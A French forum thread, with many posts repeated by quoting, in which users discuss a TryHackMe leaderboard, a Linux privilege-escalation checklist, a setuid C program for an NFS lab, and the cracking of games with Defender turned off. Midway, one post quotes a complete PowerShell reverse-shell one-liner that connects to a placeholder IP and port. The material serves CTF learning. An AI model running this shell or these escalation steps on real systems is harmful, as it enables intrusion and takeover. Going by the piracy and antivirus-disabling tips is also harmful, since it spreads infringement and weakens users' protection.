Ce sujet a été résolu
Je viens de repasser premier, mais l'autre va sûrement rush des learning path pour débutant qui rapportent des points histoire de bien me casser les couilles...
il y a 6 mois
Je garde de côté parce que je suis pas très formé sur la stéganographie pour l'instant.
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
il y a 6 mois
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si tu parles de celui-la :
https://tryhackme.com/room/linprivesc
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
il y a 6 mois
En gros, je pense qu'on peut se servir de cette room comme "d'algorithme" une fois qu'on a trouvé un accès dans la machine cible d'un challenge.
Une fois un reverse-shell avec privilèges restreints uploadé dans un room de challenge, tu peux tester les points suivants :
- Exploits du kernel (linpeas.sh peut aider)
- Sudo => gtfobins
- SUID => gtfobins
- Capabilities => cap_setuid
- Tâches CRON => Tâche encore présente en config mais script supprimé dans un répertoire auquel l'utilisateur qu'on utilise a un accès en écriture (donc il suffit de réécrire le script qu'on veut (un script malveillant donc))
- Network File Sharing (possibilité de chmod +s localement avant que le script malveillant soit répliqué sur la cible)
- PATH
Une fois un reverse-shell avec privilèges restreints uploadé dans un room de challenge, tu peux tester les points suivants :
- Exploits du kernel (linpeas.sh peut aider)
- Sudo => gtfobins
- SUID => gtfobins
- Capabilities => cap_setuid
- Tâches CRON => Tâche encore présente en config mais script supprimé dans un répertoire auquel l'utilisateur qu'on utilise a un accès en écriture (donc il suffit de réécrire le script qu'on veut (un script malveillant donc))
- Network File Sharing (possibilité de chmod +s localement avant que le script malveillant soit répliqué sur la cible)
- PATH
il y a 6 mois
Pour chopper un CDI oui
mais en freelance je faisais mes sous bien avant d'avoir l'OSCP
mais en freelance je faisais mes sous bien avant d'avoir l'OSCP
Tu t'es formé combien de temps réellement jusqu'à l'obtention de l'OSCP?
Mariama ou l'Oracle de Mayotte
il y a 6 mois
Pour te faire gagner du temps :
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
il y a 6 mois
Si tu parles de celui-la :
https://tryhackme.com/room/linprivesc
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement je parle de celle là, je pense que je vais la faire aujourd'hui, ça me permettras de compléter le path Jr Penetration Tester en même temps
C'est vraiment ce qui me manque une fois le reverse shell upload, des connaissances plus approfondis sur comment élever mes privilèges.
J'ai fais une machine tout à l'heure où je devais justement élevé mes privilèges via un cronjob caché, c'était bien sympa bien que assez simple, merci linpeas
C'est vraiment ce qui me manque une fois le reverse shell upload, des connaissances plus approfondis sur comment élever mes privilèges.
J'ai fais une machine tout à l'heure où je devais justement élevé mes privilèges via un cronjob caché, c'était bien sympa bien que assez simple, merci linpeas
il y a 6 mois
Me0w
6 mois
Pour te faire gagner du temps :
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
il y a 6 mois
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
Rien de méchant du tout.
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
il y a 6 mois
Parce qu'en fait, dans la partie NFS de cette room, tu n'as pas gcc sur la machine cible, donc t'es obligé de compiler depuis ta machine, qui dit absence de gcc dit aussi absence de certaines bibliothèques, d'où l'importance d'inclure les bibliothèques dans le binaire lors de la compilation.
il y a 6 mois
Rien de méchant du tout.
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Je vois, merci des infos je prends notes. Je comprends assez bien, j'ai fais du C quand j'étais à 42. J'ai commencé le module je suis sur "What the Shell ?", room premium qui t'apprends à faire des reverse shell/bind shell puis ensuite je passe sur linux privilege escalation , je te dirais ce que ça donne une fois dessus
il y a 6 mois
Oui, mais perso j'utilise une VM kali linux (même si je suis déjà sur linux), t'as tout de pré-installé
il y a 6 mois
J'utilise une VM kali parce que c'est extrêmement pratique et que j'aime pas faire du pentest sur mon OS principal (je suis sous linux mais ça change rien, windows sait aussi faire tourner des VM).
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
il y a 6 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
il y a 6 mois
miko
6 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Ahi, au moins windows defender fonctionne bien.
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
il y a 6 mois
Ahi, au moins windows defender fonctionne bien.
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
Effectivement au moins il fonctionne bien pour le coup,
C'est la première fois que ça m'arrive comme ça, je suis étonné qu'il l'ai détecté dans une note Obsidian...
Pour les jeux crack je récupère les CSF et applique gbe-fork et Steamless moi même, ça m'évite les emmerdes des faux positifs
C'est la première fois que ça m'arrive comme ça, je suis étonné qu'il l'ai détecté dans une note Obsidian...
Pour les jeux crack je récupère les CSF et applique gbe-fork et Steamless moi même, ça m'évite les emmerdes des faux positifs
il y a 6 mois
Le mec fait "Advert of cyber" parce que c'est la room qui rapporte le plus de point mais quelle petite merde...
Je suis repassé 2ème
Je suis repassé 2ème
il y a 6 mois
Je repasse premier, j'espère arriver à tenir l'avance pendant les 4heures restantes
il y a 6 mois
Me0w
6 mois
Je repasse premier, j'espère arriver à tenir l'avance pendant les 4heures restantes
Bon courage, moi je suis deuxième le premier est trop loin devant pour le rattraper en si peu de temps
il y a 6 mois